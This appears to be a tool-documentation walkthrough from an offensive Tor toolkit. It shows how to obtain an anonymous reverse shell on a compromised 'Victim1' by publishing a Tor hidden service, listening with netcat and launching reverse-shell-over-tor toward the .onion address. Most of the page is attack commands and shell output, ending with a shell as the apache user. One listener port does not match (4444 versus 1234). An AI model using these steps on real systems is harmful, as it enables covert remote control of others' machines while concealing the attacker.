Gaining access with reverse-shell-over-tor

We assume that we are able to execute commands in Victim1 in some way.

In order to obtain a reverse shell preserving anonymity, we will use reverse-shell-over-tor from Offensive Tor Toolkit. As shown in the following illustration, the attacker will publish a Hidden Service so that the victim can send the reverse shell to it.

1. Hidden Service and handler

The attacker will publish a Hidden Service so that the attacker can start a connection:

[attacker]$ grep '^HiddenService' /etc/tor/torrc
HiddenServiceDir /tmp/tortest
HiddenServicePort 4444 127.0.0.1:4444

[attacker]$ cat /tmp/tortest/hostname
m5et..jyd.onion

[attacker]$ tor -f /etc/tor/torrc

In order to handle the connection, the attacker will start a listener with netcat:

[attacker]$ nc -lvnp 4444

2. Victim connects to the Hidden Service

We have to launch a reverse shell from the Victim to the Hidden Service. The tool we need is reverse-shell-over-tor . The only parameter we need is the address and port in which the Hidden Service is listening.

[victim1]$ ./reverse-shell-over-tor -listener m5et..jyd.onion:4444

3. The handler receives the shell

Once the victim connects with reverse-shell-over-tor , a /bin/sh shell is launched.

[attacker]$ nc -lvnp 1234
...
id
uid=48(apache) gid=48(apache) groups=48(apache)

The attacker could change the shell binary by using the parameter -reverse-shell-program.

PreviousOverview NextMulti-shell access with hidden-bind-shell

Last updated 4 years ago

hashtag1. Hidden Service and handler

hashtag2. Victim connects to the Hidden Service

hashtag3. The handler receives the shell

1. Hidden Service and handler

2. Victim connects to the Hidden Service

3. The handler receives the shell